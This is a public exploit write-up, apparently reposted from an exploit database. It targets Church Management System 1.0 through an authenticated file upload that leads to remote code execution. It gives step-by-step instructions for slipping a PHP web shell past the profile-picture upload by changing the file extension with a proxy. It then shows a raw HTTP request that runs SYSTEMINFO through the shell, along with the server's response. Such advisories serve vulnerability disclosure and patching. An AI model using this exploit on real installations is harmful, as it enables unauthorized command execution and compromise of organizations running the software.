Share
## https://sploitus.com/exploit?id=PACKETSTORM:163365
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)  
# Date: 07/03/2021  
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html  
# Version: 1.0  
# Tested on: Windows 10  
# CVE : N/A  
  
# Proof of Concept :  
  
1- Login any user account and change profile picture.  
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)  
3- Before uploading your file, intercept your traffic by using any proxy.  
4- Change test.php.jpg file to test.php and click forward.  
5- Find your test.php file path and try any command.  
  
  
###################### REQUEST ##########################################  
  
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: image/webp,*/*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://localhost/cman/members/dashboard.php  
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc  
  
####################### RESPONSE #########################################  
  
HTTP/1.1 200 OK  
Date: Sat, 03 Jul 2021 11:28:16 GMT  
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3  
X-Powered-By: PHP/8.0.3  
Content-Length: 4410  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
Host Name: MRT  
OS Name: Microsoft Windows 10 Pro  
OS Version: 10.0.19043 N/A Build 19043  
OS Manufacturer: Microsoft Corporation  
OS Configuration: Standalone Workstation  
OS Build Type: Multiprocessor Free  
Registered Owner: Murat   
System Boot Time: 6/25/2021, 2:51:40 PM  
System Manufacturer: Dell Inc.  
System Type: x64-based PC  
Processor(s): 1 Processor(s) Installed.  
  
  
############################################################################